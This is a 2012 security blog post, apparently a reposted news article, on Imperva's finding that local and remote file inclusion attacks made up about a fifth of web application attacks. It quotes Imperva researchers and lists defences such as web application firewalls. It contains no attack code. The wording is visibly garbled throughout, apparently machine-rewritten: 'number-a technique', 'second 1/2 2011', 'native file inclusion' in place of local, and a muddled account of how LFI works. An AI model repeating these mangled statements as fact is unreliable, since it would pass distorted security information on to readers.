Bidvert-advert

Stay Update - ICT Security

Enter your email address:

We hate spam as much as you do and we will never sell, barter, or rent your email address to any unauthorized third party.

Most Frequently Used Software


CURL / XPertMailer / AutoBlogger / (Parser - PHP Simple HTML DOM)

domenica 15 aprile 2012

Remote and native file inclusion application attacks \'slipping under the radar\'

Despite accounting for a fifth of attacks on applications, awareness of remote and native file inclusion is worryingly low.

According to Imperva, local file inclusion (LFI) and remote file inclusion (RFI) attacks accounted for 21 per cent of all application attacks between June and November 2011 on 40 applications. The method allows an attacker to execute malicious code on a server to steal data.

Talking to SC Magazine, Imperva senior security strategist Noa Bar-Yosef said that with an RFI attack, the attacker uploads the malware to the server so it's an underlying application security threat, and that is prevalent as one of the vital top four techniques.

“This targets PHP applications which affect 77 per cent of web sites, so the prospective is large. The TimThumb vulnerability was an RFI attack, and so was the attack at the military dating site. This shows that file inclusion attacks are among the many top techniques we've seen,” she said.

She also said that RFI attacks are automated, with attackers using botnets to take advantage of vulnerabilities.

“SQL injection is the number-a technique to attack applications to take away data, but we're seeing better techniques. An RFI attack may cause a crash, extract data and permit an attacker to take over a server. We saw a rise within the second 1/2 2011, and what's concerning is this doesn't appear within the OWASP top ten attacks,” Bar-Yosef said.

An LFI attack is conducted when a file is added locally by tricking the server into uploading a file, so as opposed to fetching the file, it's on there already (in preference to an RFI, where you visit a remote server).

A simple approach to infection is via a jpeg file which may have .TXT code and might infect an RFI vulnerability.

Asked how this is often blocked or avoided, Bar-Yosef cited the major areas of application security: to go looking for conversations for your security online; blacklist IP addresses you understand to be bad; install an online application firewall; consider a vulnerability assessment tool where the knowledge will feed into the firewall; and look to prevent automated attacks.

She said: “Also fix your code as, ultimately, to be secure you ought to be secure yourself.”

Tal Be'ery, Imperva's senior web researcher, said: “LFI and RFI are popular attack vectors for hackers because they're less known and intensely powerful when successful. We observed that hacktivists and for-profit hackers utilised these techniques extensively in 2011, and we believe it's time for the safety community to devote more attention to the difficulty.”



Pubblicato da alle 02:02

Nessun commento:

Posta un commento

Comments links could be nofollow free

Iscriviti a: Commenti sul post (Atom)